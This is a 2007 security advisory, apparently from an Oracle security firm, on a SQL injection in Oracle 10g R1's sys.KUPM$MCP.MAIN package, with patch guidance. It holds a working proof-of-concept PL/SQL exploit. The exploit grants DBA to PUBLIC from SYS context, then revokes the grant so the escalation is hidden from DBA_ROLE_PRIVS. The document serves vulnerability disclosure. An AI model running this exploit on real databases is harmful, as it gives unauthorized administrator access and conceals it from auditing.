Products
Repscan 2.5
Hedgehog Enterprise
Checkpwd (free)
Services
Oracle Audit / Hardening
Security Training
Consulting
Information
Oracle Security Blog
Published Alerts
Upcoming Alerts
Patch Information
Whitepaper
Presentations
Oracle Fact Sheets
Exploits
Tutorials
Videos
Scripts
News & Events
Events
News
Company
Contact
People
Partner
Impressum
Sitemap
Search
SQL Injection via Oracle KUPM$MCP in Oracle 10g R1
Name
SQL Injection via Oracle KUPM$MCP in Oracle 10g R1
Systems Affected
Oracle 10g R1
Severity
High Risk
Category
SQL Injection
Credit
Alexander Kornbrust
Date
25 Mar 2007 (V 1.00)
Details
The following proof of concept exploit code injects code for a privilege escalation via a cursor. This cursor is executed in the SYS context and grants the DBA permission and revoke the privileges directly. The current session has DBA privileges but this is not visible in the Oracle view DBA_ROLE_PRIVS.
Example
SQL> DECLARE
MYC NUMBER;
BEGIN
MYC := DBMS_SQL.OPEN_CURSOR;
DBMS_SQL.PARSE(MYC,'declare pragma autonomous_transaction;
begin execute immediate ''grant dba to public'';
commit;end;',0);
sys.KUPM$MCP.MAIN('x',''' and 1=dbms_sql.execute ('||myc||')--');
END;
/
SQL> set role dba;
SQL> revoke dba from public;
SQL> select * from dba_role_privs where granted_role='DBA';
GRANTEE GRANTED_ROLE ADM DEF
------------------------------ ------------------------------ --- ---
SYS DBA YES YES
WKSYS DBA NO YES
SYSMAN DBA NO YES
SYSTEM DBA YES YES
Patch Information
Apply the patches mentioned in Oracle Critical Patch Update July 2006.
ゥ 2007 by Red-Database-Security GmbH - 25-mar-2007
Definition Exploit
An exploit is a common term in the computer security to refer to a piece of software that take advantage of a bug or vulnerability leading to a privilege escalation or d.o.s. on a computer system.
Computer security experts are using exploit code to test if a patch is working properly.